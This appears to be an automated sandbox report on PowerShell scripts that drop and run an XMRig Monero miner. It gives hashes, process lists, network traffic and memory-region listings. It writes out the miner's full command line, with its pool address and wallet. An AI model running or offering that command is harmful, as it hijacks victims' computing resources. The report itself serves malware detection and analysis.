| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2720-47-0x00000174CAC90000-0x00000174CACB0000-memory.dmp
memory/2720-48-0x00000174CAE20000-0x00000174CAE40000-memory.dmp
memory/2720-49-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/4208-50-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp
memory/2720-51-0x00000174CAE40000-0x00000174CAE60000-memory.dmp
memory/2720-53-0x00000174CC720000-0x00000174CC740000-memory.dmp
memory/4208-52-0x00007FF8CEBF3000-0x00007FF8CEBF5000-memory.dmp
memory/2720-54-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/4208-55-0x00007FF8CEBF0000-0x00007FF8CF6B1000-memory.dmp
memory/2720-56-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-57-0x00000174CAE40000-0x00000174CAE60000-memory.dmp
memory/2720-59-0x00000174CC720000-0x00000174CC740000-memory.dmp
memory/2720-58-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-60-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-61-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-62-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-63-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-64-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-65-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-66-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-67-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-68-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-69-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-70-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-71-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-72-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-73-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-74-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-75-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-76-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-77-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-78-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-79-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-80-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-81-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-82-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-83-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-84-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-85-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-86-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-87-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-88-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-89-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-90-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-91-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-92-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-93-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-94-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-95-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-96-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-97-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-98-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-99-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-100-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-101-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-102-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-103-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-104-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-105-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-106-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-107-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-108-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-109-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-110-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-111-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-112-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-113-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-114-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-115-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-116-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-117-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
memory/2720-118-0x00007FF69F840000-0x00007FF6A0473000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240611-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5088 wrote to memory of 4480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5088 wrote to memory of 4480 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4440,i,6870419347051655189,5491911050420577193,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3784,i,6870419347051655189,5491911050420577193,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/5088-0-0x00007FFFE4253000-0x00007FFFE4255000-memory.dmp
memory/5088-1-0x0000021BF0960000-0x0000021BF0982000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fgvgiv4.dve.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5088-11-0x00007FFFE4250000-0x00007FFFE4D11000-memory.dmp
memory/5088-12-0x00007FFFE4250000-0x00007FFFE4D11000-memory.dmp
memory/5088-14-0x00007FFFE4250000-0x00007FFFE4D11000-memory.dmp
memory/5088-15-0x0000021BF0E10000-0x0000021BF0E22000-memory.dmp
memory/5088-16-0x0000021BF0500000-0x0000021BF050A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4480-47-0x00000121CD860000-0x00000121CD880000-memory.dmp
memory/4480-48-0x00000121CD8A0000-0x00000121CD8C0000-memory.dmp
memory/4480-49-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-50-0x00000121CD8C0000-0x00000121CD8E0000-memory.dmp
memory/4480-51-0x00000121CD8E0000-0x00000121CD900000-memory.dmp
memory/4480-52-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/5088-53-0x00007FFFE4253000-0x00007FFFE4255000-memory.dmp
memory/5088-54-0x00007FFFE4250000-0x00007FFFE4D11000-memory.dmp
memory/4480-55-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/5088-56-0x00007FFFE4250000-0x00007FFFE4D11000-memory.dmp
memory/4480-57-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-59-0x00000121CD8E0000-0x00000121CD900000-memory.dmp
memory/4480-58-0x00000121CD8C0000-0x00000121CD8E0000-memory.dmp
memory/4480-60-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-61-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-62-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-63-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-64-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-65-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-66-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-67-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-68-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-69-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-70-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-71-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-72-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-73-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-74-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-75-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-76-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-77-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-78-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-79-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-80-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-81-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-82-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-83-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-84-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-85-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-86-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-87-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-88-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-89-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-90-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-91-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-92-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-93-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-94-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-95-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-96-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-97-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-98-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-99-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-100-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-101-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-102-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-103-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-104-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-105-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-106-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-107-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-108-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-109-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-110-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-111-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-112-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-113-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-114-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-115-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-116-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-117-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
memory/4480-118-0x00007FF6C5530000-0x00007FF6C6163000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1722s
Max time network
1731s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/964-0-0x00007FFB795C3000-0x00007FFB795C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvwgcn0q.qns.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/964-7-0x00000201F51A0000-0x00000201F51C2000-memory.dmp
memory/964-11-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
memory/964-12-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
memory/964-13-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
memory/964-14-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
memory/964-15-0x00007FFB795C3000-0x00007FFB795C5000-memory.dmp
memory/964-16-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
memory/964-17-0x00007FFB795C0000-0x00007FFB7A081000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:10
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4540 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4540 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4540-3-0x00007FFCC3B93000-0x00007FFCC3B94000-memory.dmp
memory/4540-5-0x000001AA797B0000-0x000001AA797D2000-memory.dmp
memory/4540-8-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-9-0x000001AA79F00000-0x000001AA79F76000-memory.dmp
memory/4540-10-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jhq1riv5.ml4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
